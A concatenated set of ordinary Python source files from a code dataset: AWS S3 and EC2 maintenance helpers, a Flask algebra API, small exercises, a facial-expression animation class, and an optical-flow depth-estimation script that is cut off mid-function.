'/'.join([TS_AWS_S3_PREFIX, alert_key])\n\n return alert_key\n\ndef _get_bucket_objects(prefix=None):\n '''\n Return a list of S3 objects under a given prefix.\n '''\n # We can only get 1000 objects at a time. 
Also, list_objects() was not\n # returning a Marker on truncated responses so using list_objects_v2()\n # here instead.\n objects = []\n client_continuation_token = ''\n\n s3_client = boto3.client('s3')\n while True:\n list_object_params = {\n 'Bucket': TS_AWS_S3_BUCKET,\n }\n\n if prefix:\n list_object_params['Prefix'] = prefix\n\n if client_continuation_token:\n list_object_params['ContinuationToken'] = client_continuation_token\n\n try:\n response = s3_client.list_objects_v2(**list_object_params)\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n objects += response.get('Contents')\n\n # Break if response tells us there is no more.\n if response.get('IsTruncated'):\n client_continuation_token = response.get('NextContinuationToken')\n else:\n break\n\n return objects\n\ndef _get_webhooks_key_prefix():\n '''\n Return key prefix where webhook data is stored.\n '''\n if TS_AWS_S3_PREFIX:\n webhooks_prefix = '/'.join([TS_AWS_S3_PREFIX, 'webhooks'])\n else:\n webhooks_prefix = 'webhooks'\n\n return webhooks_prefix\n\ndef _put_s3_object(key, body):\n '''\n Put an object in S3.\n '''\n s3_client = boto3.client('s3')\n try:\n response = s3_client.put_object(\n Body=body,\n Bucket=TS_AWS_S3_BUCKET,\n Key=key\n )\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n return response\n\ndef is_available():\n '''\n Check ability to access S3 bucket.\n '''\n s3_client = boto3.client('s3')\n try:\n kwargs = {'Bucket': TS_AWS_S3_BUCKET}\n if TS_AWS_S3_PREFIX:\n kwargs['Prefix'] = TS_AWS_S3_PREFIX\n s3_client.list_objects(**kwargs)\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n return True\n\ndef get_alert_by_id(alert_id):\n '''\n Get alert by alert ID\n '''\n alert_key = _get_alert_data_key(alert_id)\n s3_client = boto3.client('s3')\n try:\n alert_data = s3_client.get_object(\n Bucket=TS_AWS_S3_BUCKET,\n Key=alert_key\n )\n except ClientError as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError(e).with_traceback(exc_info[2])\n else:\n six.reraise(S3ClientError, S3ClientError(e), exc_info[2])\n except RequestException as e:\n exc_info = sys.exc_info()\n if sys.version_info >= (3,0,0):\n raise S3ClientError('Failure to communicate with S3').with_traceback(exc_info[2])\n 
else:\n six.reraise(S3ClientError, S3ClientError('Failure to communicate with S3'), exc_info[2])\n\n\n body = alert_data.get('Body')\n body_text = body.read()\n\n return json.loads(body_text)\n\ndef get_alerts_by_date(start, end):\n '''\n Get alerts between given date start and end.\n\n both start and end are datetime objects with timezone info\n '''\n # We store webhooks by date and time so we search for those first.\n webhooks_prefix = _get_webhooks_key_prefix()\n webhook_objects = _get_bucket_objects(webhooks_prefix)\n\n alert_ids = []\n for obj in webhook_objects:\n key = obj.get('Key')\n # Remove webhook path prefix (and delimiter) and split string into\n # time prefix and alert ID.\n webhook_time_prefix, alert_id = key[len(webhooks_prefix) + 1:].rsplit('/', 1)\n # There are more compact ways of doing the following but I prefer to\n # show the sequence of events.\n #\n # split prefix into a list of strings.\n webhook_time_prefix_list = webhook_time_prefix.split('/')\n # use list comprehension to create a list of ints. See also:\n # map(int, webhook_time_prefix_list)\n webhook_time_prefix_ints = [int(e) for e in webhook_time_prefix_list]\n # use *expression syntax to pass in values as a set of arguments. Also\n # supply tzinfo because the datetime objects we're supplied have them.\n webhook_time = datetime.datetime(*webhook_time_prefix_ints, tzinfo=UTC)\n\n if start < webhook_time < end:\n alert_ids.append(alert_id)\n\n alerts = []\n for alert_id in alert_ids:\n alert_data = get_alert_by_id(alert_id)\n alerts.append(alert_data)\n\n return alerts\n\ndef put_webhook_data(alert):\n '''\n Put alert webhook data in S3 bucket.\n '''\n alert_time = time.gmtime(alert.get('created_at')/1000)\n alert_time_path = time.strftime('%Y/%m/%d/%H/%M', alert_time)\n webhooks_prefix = _get_webhooks_key_prefix()\n alert_key = '/'.join([webhooks_prefix, alert_time_path, alert.get('id')])\n alert_json = json.dumps(alert)\n\n _put_s3_object(alert_key, alert_json)\n\n return None\n\ndef put_alert_data(alert):\n '''\n Put alert data in S3.\n '''\n alert_id = alert.get('id')\n alert_key = _get_alert_data_key(alert_id)\n alert_json = json.dumps(alert)\n\n _put_s3_object(alert_key, alert_json)\n\n return None\n\n","sub_path":"app/models/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":7649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"502938536","text":"from datetime import datetime, timedelta, timezone\nimport datetime\nimport boto3\n\nec2_client = boto3.client('ec2')\n\nclass Ec2Instances(object):\n \n def __init__(self, region):\n print(\"region \"+ region)\n self.ec2 = boto3.client('ec2', region_name=region)\n \n def delete_snapshots(self, older_days=14):\n delete_snapshots_num = 0\n imagesList = self.get_images()\n \n for image in imagesList:\n str_creation_date = image['CreationDate']\n #print(\"CreationDate String: \" + str_creation_date)\n \n fmt_creation_date = datetime.datetime.strptime(str_creation_date, '%Y-%m-%dT%H:%M:%S.%fZ')\n print(\"CreationDate Formatted: \" + str(fmt_creation_date))\n \n print(\"Cutoff time: \" + str(self.get_delete_data(older_days))) \n print(\"-------------\")\n print(\"-------------\")\n \n if (fmt_creation_date < self.get_delete_data(older_days)):\n print(\"Deregistering image %s\" % image['ImageId'])\n amiResponse = ec2_client.deregister_image(\n ImageId=image['ImageId'],\n )\n #print(amiResponse)\n print(\"-------------\")\n\n block_device_mappings = image['BlockDeviceMappings']\n 
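# BlockDeviceMappings is a list of dicts; EBS-backed entries look like
# {'DeviceName': '/dev/xvda', 'Ebs': {'SnapshotId': 'snap-...'}}, while
# instance-store entries carry no 'Ebs' key -- hence the "Ebs" membership
# check in the loop below.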
#print(\"block_device_mapping: %s\", block_device_mappings)\n #print(\"mappings: %s\", len(block_device_mappings))\n \n for block_device_mapping in block_device_mappings:\n if \"Ebs\" in block_device_mapping:\n device = block_device_mapping['Ebs']\n #print(\"ebs: %s\", device)\n snapshot_id = device['SnapshotId']\n print(\"snapshot_id: %s\", snapshot_id)\n snapResponse = ec2_client.delete_snapshot(\n SnapshotId=snapshot_id)\n #print(snapResponse)\n print(\"Deleted snapshot: %s \", snapshot_id)\n delete_snapshots_num = delete_snapshots_num + 1\n\n return delete_snapshots_num\n \n def get_images(self):\n images = self.ec2.describe_images(Filters=[{'Name': 'name', 'Values': ['MaintenanceWindow*']}])\n #print(\"filtered images \" + str(images))\n return images['Images']\n\n def get_delete_data(self, older_days):\n delete_time = datetime.datetime.now(tz=None) - timedelta(days=older_days)\n return delete_time;\n \ndef lambda_handler(event, context):\n print(\"event \" + str(event))\n print(\"context \" + str(context))\n region_name = \"eu-west-1\"\n instances = Ec2Instances(region_name)\n deleted_counts = instances.delete_snapshots(14)\n print(\"deleted_counts for region \"+ str(region_name) +\" is \" + str(deleted_counts))\n return 'completed'","sub_path":"daily_mw_snapshot_cleanup/auto_daily_mw_snapshot_cleanup.py","file_name":"auto_daily_mw_snapshot_cleanup.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"394966768","text":"\nimport pathlib\nimport sys\n\nfrom packaging import version\n\nimport yaml\n\n\ndef main(path):\n \"\"\"Release versions derived from directory names in `envoy/docs`.\n\n Currently this determines stable <> archived based on the last\n 4 minor versions being stable. 
We may want to rethink this.\n \"\"\"\n\n # Read the versions from the directory names\n versions = [\n version.Version(x.name)\n for x\n in pathlib.Path(path).glob(\"v*\")]\n\n # Group versions into minor versions\n minor_versions = {}\n for v in versions:\n minor = version.Version(f\"{v.major}.{v.minor}\")\n minor_versions[minor] = minor_versions.get(minor, [])\n minor_versions[minor].append(v)\n\n # Sort the minor version keys\n sorted_minor_versions = list(reversed(sorted(minor_versions)))\n\n # Dump the YAML\n print(yaml.dump([\n dict(title=\"Stable versions\",\n versions=[\n dict(version=v.base_version,\n releases=[\n _v.base_version\n for _v\n in reversed(sorted(minor_versions[v]))])\n for v\n in sorted_minor_versions[:4]]),\n dict(\n title=\"Development version\",\n versions=[dict(version=\"Latest\")]),\n dict(title=\"Archived versions\",\n versions=[\n dict(version=v.base_version,\n releases=[\n _v.base_version\n for _v\n in reversed(sorted(minor_versions[v]))])\n for v\n in sorted_minor_versions[4:]])]))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","sub_path":"tools/versions/release_versions.py","file_name":"release_versions.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"600890521","text":"from __future__ import print_function, division, absolute_import\n\nimport os\nimport sys\nfrom six import add_metaclass\n\nfrom abc import abstractmethod, abstractproperty, ABCMeta\nimport numpy as np\n\nfrom utils import read_openface\n\n# ===========================================================================\n# Helper\n# ===========================================================================\n# path to the database\nDATABASE = os.path.join(os.path.dirname(sys.argv[0]), \"database\")\n\n\ndef _searching_expression(name, level, nframes, extension):\n def distance_func(x):\n x = x.split('.')[0].split('_')\n l1 = int(x[1])\n n1 = int(x[2])\n return abs(l1 - level) * 10000 + abs(n1 - nframes)\n all_files = [i for i in os.listdir(DATABASE) if extension in i]\n # match the name\n all_files = [i for i in all_files if name + \"_\" in i]\n # match all <= intensity, and sorted by order of decreasing\n all_files = sorted([i for i in all_files if int(i.split('_')[1]) <= level],\n key=lambda x: distance_func(x))\n if len(all_files) == 0:\n raise ValueError(\"Cannot file any file with, \"\n \"name:%s, level:%d, nframes:%d, ext:%s\" % (name, level, nframes, extension))\n # ====== found file ====== #\n found = all_files[0]\n desire_name = \"%s_%d_%d\" % (name, level, nframes)\n if found.split('.')[0] != desire_name:\n print(\"[WARNING] Request expression with configuration: %-12s, but only \"\n \"found expression: %-12s\" % (desire_name, found.split('.')[0]))\n return os.path.join(DATABASE, found)\n\n\ndef interpolate(last_frame, first_frame, nFrames):\n res = []\n for i in range(nFrames):\n temp = [(1 - i / float(nFrames - 1)) * x + (i / float(nFrames - 1)) * y\n for x, y in zip(last_frame, first_frame)]\n temp = np.concatenate([t[None, :] for t in temp])[None, :]\n res.append(temp)\n res = np.concatenate(res, 0)\n return res\n\n\n# ===========================================================================\n# Expression\n# ===========================================================================\n@add_metaclass(ABCMeta)\nclass Expression(object):\n \"\"\" Expression\n Attributes\n ----------\n frames: ndarray [nb_frames x nb_points_per_frames(68) x 3(x,y,z)]\n audio: str (path to 
wav file)\n \"\"\"\n\n def __init__(self, level, nframes):\n super(Expression, self).__init__()\n self._name = self.__class__.__name__.lower()\n self._level = level\n self._nframes = nframes\n # ====== find appropriate frames file ====== #\n _ = _searching_expression(self._name, self._level, self._nframes, '.csv')\n self._frames = read_openface(_)\n # infer audio file name from frames file name\n _ = os.path.basename(_).split('.')[0] + '.wav'\n self._audio = os.path.join(DATABASE, _)\n if not os.path.exists(self._audio):\n raise RuntimeError(\"Cannot find audio file for the expression: %s, \"\n \"at path: %s\" % (self.name, self._audio))\n\n def __getitem__(self, idx):\n return self._frames[idx]\n\n @property\n def name(self):\n return \"%s_%d_%d\" % (self._name, self._level, self._nframes)\n\n @property\n def level(self):\n return self._level\n\n @property\n def nframes(self):\n return self._nframes\n\n @property\n def frames(self):\n return self._frames\n\n @property\n def audio(self):\n return self._audio\n\n def copy(self):\n clazz = self.__class__\n obj = clazz.__new__(clazz)\n obj._name = self._name\n obj._level = self._level\n obj._nframes = self._nframes\n obj._frames = np.copy(self._frames)\n obj._audio = self._audio\n return obj\n\n def __str__(self):\n return \"<[%s] level:%d #frames:%d audio:%s>\" % \\\n (self.__class__.__name__, self._level, self._nframes, self._audio)\n\n # ==================== Frames manipulation ==================== #\n def set_reference(self, frame):\n \"\"\" Use a frame as a reference for this expression\n * Calculating the cummulative differences of all frames to the first\n frame of this expression.\n * Adding the differences to the reference frame.\n \"\"\"\n frame = np.expand_dims(frame, 0)\n if frame.shape != (1,) + self.frames.shape[1:]:\n raise ValueError(\"Reference frame must have shape: %s\" %\n self.frames.shape[1:])\n offset = self._frames[1:] - self._frames[:-1]\n offset = np.cumsum(offset, axis=0)\n self._frames = frame + offset\n return self\n\n def after(self, expression, interp=5):\n \"\"\" Interplolate this expression so it can be played after\n the given expression in the argument.\n Step-by-step of the interpolation:\n * Calculate interpolation frames from the last frame of given\n expression to first frame of this expression.\n * Add the cummulative differences of this expression the\n the last frame of the interpolated frames.\n * Woala!\n \"\"\"\n if not isinstance(expression, Expression):\n raise ValueError(\"`expression` argument must be instance of Expression.\")\n last_frame = expression[-1]\n # ====== interpolate first ====== #\n interp = interpolate(last_frame, self.frames[0], nFrames=interp)\n # ====== adding offset ====== #\n offset = self._frames[1:] - self._frames[:-1]\n offset = np.cumsum(offset, axis=0)\n last_frame = np.expand_dims(interp[-1], 0)\n offset = offset + last_frame\n # ====== assign ====== #\n self._frames = np.concatenate([interp, offset], axis=0)\n return self\n\n def merge(self, expr):\n raise NotImplementedError\n\n def adjust(self, length, nframes):\n raise NotImplementedError\n\n\n# NOTE: you only need to name the class matching the expression name.\nclass Happy(Expression):\n pass\n\n\nclass Sad(Expression):\n pass\n\n\nclass Laugh(Expression):\n pass\n","sub_path":"SynthesisModule/expression.py","file_name":"expression.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"32623618","text":"from contextlib 
import contextmanager\nimport re\nimport os\n\ndef pystringtest():\n words : str = 'Connect Foundation'\n clearring = re.compile(r'\\W')\n\n if 'F' in words:\n words.lower()\n # words[7] = '&'\n words = re.sub(clearring, '&', words\n )\n else:\n print(words)\n\n print(words)\n\ndef pylisttest():\n words : list = [\"Hello\", \"Happy\", \"World\"]\n print(id(words))\n words.append([\"Connect\", \"Foundation\", \"Education\"])\n print(id(words))\n words.extend([\"Here\", 2018]) # Equivalent to words += [\"Here\", 2018]\n print(id(words))\n\n print(words)\n print(len(words))\n\n@contextmanager\ndef open_file(filename : str, mode : str):\n f = open(filename, mode)\n try:\n yield f\n finally:\n f.close()\n\ndef pydicttest():\n counts : dict = dict()\n names : list = ['csen', 'cwen', 'csen', 'derr', 'csen', 'derr', 'cwen', 'csen']\n for name in names:\n counts[name] = counts.get(name, 0) + 1\n print(counts, end=\"\\n--------------------------------------------\\n\")\n\n freq = dict()\n splitpattern = re.compile(r'[\\s]+')\n removepattern = re.compile(r'\\W') # matches non-word characters, i.e. [^a-zA-Z0-9_]\n with open_file(\"countries.txt\", 'r') as file:\n for line in file:\n words : list = re.split(splitpattern, line)[:-1]\n for word in words:\n if word == '':\n continue\n word = re.sub(removepattern, '', word)\n freq[word] = freq.get(word, 0) + 1\n\n print(dict(sorted(freq.items())))\n print(sorted([(v,k) for k,v in freq.items()]))\n\n bigword = None\n bigcount = None\n for word, count in freq.items():\n if bigcount is None or count > bigcount:\n bigword = word\n bigcount = count\n\n print(bigword, bigcount)\n\nif __name__ == \"__main__\":\n pystringtest()\n print()\n pylisttest()\n print()\n pydicttest()\n print()\n\n\n","sub_path":"pytest001/src/mytest01/string-test01.py","file_name":"string-test01.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"608542425","text":"\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nimport sys\nfrom helper import algebra\nfrom helper import algebra2d\nfrom helper import algebra3d\n\napp = Flask(__name__)\n\n\n@app.route(\"/3D\", methods=['POST', 'GET'])\ndef algebra3D_API():\n # Request Structure:\n # equation\n # xStart\n # yStart\n # xEnd\n # yEnd\n # Return Structure:\n # equation\n # latex\n # xValues\n # yValues\n # zValues\n\n # Get Data\n req = request.get_json(force=True)\n print(req)\n\n # Process Data\n equation = 
algebra.getStringEq(Xequation)\n xValues, yValues = algebra2d.getXYValuesFromXEq(equation, start, end)\n else:\n # Process as equation in terms of x\n equation = algebra.getStringEq(Yequation)\n xValues, yValues = algebra2d.getXYValuesFromYEq(equation, start, end)\n\n latex = algebra.getLatexEq(equation)\n\n # Package Data\n resp = {\n \"equation\": equation,\n \"latex\": latex,\n \"xValues\": xValues.astype(float).tolist(),\n \"yValues\": yValues.astype(float).tolist(),\n }\n\n print(resp)\n\n return jsonify(resp)\n\n\n@app.route(\"/\")\ndef hello_world():\n return \"hello world!\"\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"305167146","text":"import sys\nsys.stdin = open('P2.txt')\nT = int(input())\nD = [(1, 0), (0, 1), (-1, 0), (0, -1)]\ndef find(y, x):\n global dis\n queue = []\n queue.append((y, x))\n L = 0\n while queue:\n y,x = queue.pop(0)\n for dy, dx in D:\n nx = x + dx\n ny = y + dy\n if 0 <= nx < 10 and 0 <= ny < 10:\n queue.append((ny,nx))\n if arr[ny][nx] != 0 and arr[ny][nx] != 9:\n dis += L\n arr[ny][nx] =0\n arr[y][x] =0\n return\n L += 1\n\n\nfor tc in range(T):\n N = int(input())\n arr = [list(map(int,input().split())) for _ in range(10)]\n dis = 0\n for i in range(10):\n for j in range(10):\n if arr[i][j] == 9:\n find(i,j)\n print('#{} {}'.format(tc+1, dis))","sub_path":"08_algorithm/al.t/P2.과자먹기.py","file_name":"P2.과자먹기.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"467102193","text":"import cv2\nfrom cv2 import DISOpticalFlow\nimport numpy as np\nfrom pyquaternion import Quaternion\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.sparse\nimport scipy.sparse.linalg\nimport copy\nimport sys\nimport pdb\nimport pickle\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\nimport matplotlib as mpl\nimport matplotlib.cm as cm\n\nsys.path.append('../utils')\nfrom bilateral_filter import bilateral_filter\n\ninput_frames = \"sample_data/frames/\"\ninput_colmap = \"sample_data/reconstruction/\"\noutput_folder = \"output/\"\n\ndump_debug_images = True\n\n# Algorithm parameters. 
See the paper for details.\n\ntau_high = 0.1\ntau_low = 0.1\ntau_flow = 0.2\nk_I = 5\nk_T = 7\nk_F = 31\nlambda_d = 1\nlambda_t = 0.01\nlambda_s = 1\n\nnum_solver_iterations = 500\n\nclass Reconstruction:\n def __init__(self):\n self.cameras = {}\n self.views = {}\n self.points3d = {}\n self.min_view_id = -1\n self.max_view_id = -1\n self.image_folder = \"\"\n \n def ViewIds(self):\n return list(self.views.keys())\n \n def GetNeighboringKeyframes(self, view_id):\n previous_keyframe = -1\n next_keyframe = -1\n for idx in range(view_id - 1, self.min_view_id, -1):\n if idx not in self.views:\n continue\n if self.views[idx].IsKeyframe():\n previous_keyframe = idx\n break\n for idx in range(view_id + 1, self.max_view_id):\n if idx not in self.views:\n continue\n if self.views[idx].IsKeyframe():\n next_keyframe = idx\n break\n if previous_keyframe < 0 or next_keyframe < 0:\n return np.array([])\n return [previous_keyframe, next_keyframe]\n \n def GetReferenceFrames(self, view_id):\n kf = self.GetNeighboringKeyframes(view_id)\n if (len(kf) < 2):\n return []\n dist = np.linalg.norm(self.views[kf[1]].Position() -\\\n self.views[kf[0]].Position()) / 2\n pos = self.views[view_id].Position()\n ref = []\n for idx in range(view_id + 1, self.max_view_id):\n if idx not in self.views:\n continue\n if (np.linalg.norm(pos -\\\n self.views[idx].Position()) > dist):\n ref.append(idx)\n break\n for idx in range(view_id - 1, self.min_view_id, -1):\n if idx not in self.views:\n continue\n if (np.linalg.norm(pos -\\\n self.views[idx].Position()) > dist):\n ref.append(idx)\n break\n return ref\n\n def GetImage(self, view_id):\n return self.views[view_id].GetImage(self.image_folder)\n \n def GetSparseDepthMap(self, frame_id):\n camera = self.cameras[self.views[frame_id].camera_id]\n view = self.views[frame_id]\n view_pos = view.Position()\n depth_map = np.zeros((camera.height, camera.width), dtype=np.float32)\n for point_id, coord in view.points2d.items():\n pos3d = self.points3d[point_id].position3d\n depth = np.linalg.norm(pos3d - view_pos)\n depth_map[int(coord[1]), int(coord[0])] = depth\n return depth_map\n \n def Print(self):\n print(\"Found \" + str(len(self.views)) + \" cameras.\")\n for id in self.cameras:\n self.cameras[id].Print()\n print(\"Found \" + str(len(self.views)) + \" frames.\")\n for id in self.views:\n self.views[id].Print()\n\nclass Point:\n def __init__(self):\n self.id = -1\n self.position3d = np.zeros(3, float)\n \n \nclass Camera:\n\n def __init__(self):\n self.id = -1\n self.width = 0\n self.height = 0\n self.focal = np.zeros(2,float)\n self.principal = np.zeros(2,float)\n self.model = \"\"\n \n def Print(self):\n print(\"Camera \" + str(self.id))\n print(\"-Image size: (\" + str(self.width) + \\\n \", \" + str(self.height) + \")\")\n print(\"-Focal: \" + str(self.focal))\n print(\"-Model: \" + self.model)\n print(\"\")\n\nclass View: \n def __init__(self):\n self.id = -1\n self.orientation = Quaternion()\n self.translation = np.zeros(3, float)\n self.points2d = {}\n self.camera_id = -1\n self.name = \"\"\n \n def IsKeyframe(self):\n return len(self.points2d) > 0\n \n def Rotation(self):\n return self.orientation.rotation_matrix\n \n def Position(self):\n return self.orientation.rotate(self.translation)\n \n def GetImage(self, image_folder):\n mat = cv2.imread(image_folder + \"/\" + self.name)\n # Check that we loaded correctly.\n assert mat is not None, \\\n \"Image \" + self.name + \" was not found in \" \\\n + image_folder\n return mat\n \n def Print(self):\n print(\"Frame \" + 
str(self.id) + \": \" + self.name)\n print(\"Rotation: \\n\" + \\\n str(self.Rotation()))\n print(\"Position: \\n\" + \\\n str(self.Position()))\n print(\"\")\n \ndef ReadColmapCamera(filename):\n file = open(filename, \"r\")\n line = file.readline()\n cameras = {}\n while (line):\n if (line[0] != '#'):\n tokens = line.split()\n id_value = int(tokens[0])\n cameras[id_value] = Camera()\n cameras[id_value].id = id_value\n cameras[id_value].model = tokens[1]\n # Currently we're assuming that the camera model\n # is in the SIMPLE_RADIAL format\n assert(cameras[id_value].model == \"PINHOLE\")\n cameras[id_value].width = int(tokens[2])\n cameras[id_value].height = int(tokens[3])\n cameras[id_value].focal[0] = float(tokens[4])\n cameras[id_value].focal[1] = float(tokens[5])\n cameras[id_value].principal[0] = float(tokens[6])\n cameras[id_value].principal[1] = float(tokens[7])\n line = file.readline()\n return cameras;\n\ndef ReadColmapImages(filename):\n file = open(filename, \"r\")\n line = file.readline()\n views = {}\n while (line):\n if (line[0] != '#'):\n tokens = line.split()\n id_value = int(tokens[0])\n views[id_value] = View()\n views[id_value].id = id_value\n views[id_value].orientation = Quaternion(float(tokens[1]), \\\n float(tokens[2]), \\\n float(tokens[3]), \\\n float(tokens[4]))\n views[id_value].translation[0] = float(tokens[5])\n views[id_value].translation[1] = float(tokens[6])\n views[id_value].translation[2] = float(tokens[7])\n views[id_value].camera_id = int(tokens[8])\n views[id_value].name = tokens[9]\n line = file.readline()\n tokens = line.split()\n views[id_value].points2d = {}\n for idx in range(0, len(tokens) // 3):\n point_id = int(tokens[idx * 3 + 2])\n coord = np.array([float(tokens[idx * 3 + 0]), \\\n float(tokens[idx * 3 + 1])])\n views[id_value].points2d[point_id] = coord\n \n # Read the observations...\n line = file.readline()\n return views\n \ndef ReadColmapPoints(filename):\n file = open(filename, \"r\")\n line = file.readline()\n points = {}\n while (line):\n if (line[0] != '#'):\n tokens = line.split()\n id_value = int(tokens[0])\n points[id_value] = Point()\n points[id_value].id = id_value\n points[id_value].position3d = np.array([float(tokens[1]), \\\n float(tokens[2]), \\\n float(tokens[3])])\n \n line = file.readline()\n return points\n \n \n \ndef ReadColmap(poses_folder, images_folder):\n # Read the cameras (intrinsics)\n recon = Reconstruction()\n recon.image_folder = images_folder\n recon.cameras = ReadColmapCamera(poses_folder + \"/cameras.txt\")\n recon.views = ReadColmapImages(poses_folder + \"/images.txt\")\n recon.points3d = ReadColmapPoints(poses_folder + \"/points3D.txt\")\n recon.min_view_id = min(list(recon.views.keys()))\n recon.max_view_id = max(list(recon.views.keys()))\n print(\"Number of points: \" + str(len(recon.points3d)))\n print(\"Number of frames: \" + str(len(recon.views)))\n #assert len(recon.views) == (recon.max_view_id - recon.min_view_id) + 1, \"Min\\max: \" + str(recon.max_view_id) + \" \" + str(recon.min_view_id)\n return recon\n\nimport flow_color\n\ndis = DISOpticalFlow.create(2)\ndef GetFlow(image1, image2):\n flow = np.zeros((image1.shape[0], image1.shape[1], 2), np.float32)\n flow = dis.calc(\\\n cv2.cvtColor(image1,cv2.COLOR_BGR2GRAY),\\\n cv2.cvtColor(image2,cv2.COLOR_BGR2GRAY), flow)\n return flow\n\ndef AbsoluteMaximum(images):\n assert(len(images) > 0)\n output = images[0]\n for i in range(1,len(images)):\n output[np.abs(images[i]) > np.abs(output)] = images[i][np.abs(images[i]) > np.abs(output)]\n return 
output\n\ndef GetImageGradient(image):\n xr,xg,xb = cv2.split(cv2.Sobel(image,cv2.CV_64F,1,0,ksize=5))\n yr,yg,yb = cv2.split(cv2.Sobel(image,cv2.CV_64F,0,1,ksize=5))\n img_grad_x = AbsoluteMaximum([xr,xg,xb])\n img_grad_y = AbsoluteMaximum([yr,yg,yb])\n \n return img_grad_x, img_grad_y\n\ndef GetGradientMagnitude(img_grad_x, img_grad_y):\n img_grad_magnitude = cv2.sqrt((img_grad_x * img_grad_x) \\\n + (img_grad_y * img_grad_y))\n return img_grad_magnitude\n\ndef GetFlowGradientMagnitude(flow, img_grad_x, img_grad_y):\n x1,x2 = cv2.split(cv2.Sobel(flow,cv2.CV_64F,1,0,ksize=5))\n y1,y2 = cv2.split(cv2.Sobel(flow,cv2.CV_64F,0,1,ksize=5))\n flow_grad_x = AbsoluteMaximum([x1,x2])\n flow_grad_y = AbsoluteMaximum([y1,y2])\n flow_gradient_magnitude = cv2.sqrt((flow_grad_x * flow_grad_x) \\\n + (flow_grad_y * flow_grad_y))\n reliability = np.zeros((flow.shape[0], flow.shape[1]))\n\n for x in range(0, flow.shape[0]):\n for y in range(1, flow.shape[1]):\n magn = (img_grad_x[x,y] * img_grad_x[x,y]) + \\\n (img_grad_y[x,y] * img_grad_y[x,y])\n gradient_dir = np.array((img_grad_y[x,y], img_grad_x[x,y]))\n if (np.linalg.norm(gradient_dir) == 0):\n reliability[x,y] = 0\n continue\n gradient_dir = gradient_dir / np.linalg.norm(gradient_dir)\n center_pixel = np.array((x,y))\n p0 = center_pixel + gradient_dir\n p1 = center_pixel - gradient_dir\n if p0[0] < 0 or p1[0] < 0 or p0[1] < 0 or p1[1] < 0 \\\n or p0[0] >= flow.shape[0] or p0[1] >= flow.shape[1] or \\\n p1[0] >= flow.shape[0] or p1[1] >= flow.shape[1]:\n reliability[x,y] = -1000\n continue\n f0 = flow[int(p0[0]), int(p0[1])].dot(gradient_dir)\n f1 = flow[int(p1[0]), int(p1[1])].dot(gradient_dir)\n reliability[x,y] = f1 - f0\n\n return flow_gradient_magnitude, reliability\n\ndef GetSoftEdges(image, flows):\n img_grad_x, img_grad_y = GetImageGradient(image)\n img_grad_magnitude = GetGradientMagnitude(img_grad_x, img_grad_y)\n if (dump_debug_images):\n plt.imsave(output_folder + \"/image_gradient.png\", \\\n img_grad_magnitude)\n flow_gradient_magnitude = np.zeros(img_grad_magnitude.shape)\n \n max_reliability = np.zeros(flow_gradient_magnitude.shape)\n i = 0\n for flow in flows:\n magnitude, reliability = GetFlowGradientMagnitude(flow, img_grad_x, img_grad_y)\n if (dump_debug_images):\n plt.imsave(output_folder + \"/flow_\" + str(i) + \".png\", \\\n flow_color.computeImg(flow)) \n plt.imsave(output_folder + \"/reliability_\" + str(i) + \".png\", \\\n reliability)\n flow_gradient_magnitude[reliability > max_reliability] = magnitude[reliability > max_reliability]\n i += 1\n \n if (dump_debug_images):\n plt.imsave(output_folder + \"/flow_gradient.png\", \\\n flow_gradient_magnitude)\n flow_gradient_magnitude = \\\n cv2.GaussianBlur(flow_gradient_magnitude,(k_F, k_F),0)\n flow_gradient_magnitude *= img_grad_magnitude\n flow_gradient_magnitude /= flow_gradient_magnitude.max()\n return flow_gradient_magnitude\n \ndef Canny(soft_edges, image):\n image = cv2.GaussianBlur(image, (k_I, k_I), 0)\n xr,xg,xb = cv2.split(cv2.Sobel(image,cv2.CV_64F,1,0,ksize=5))\n yr,yg,yb = 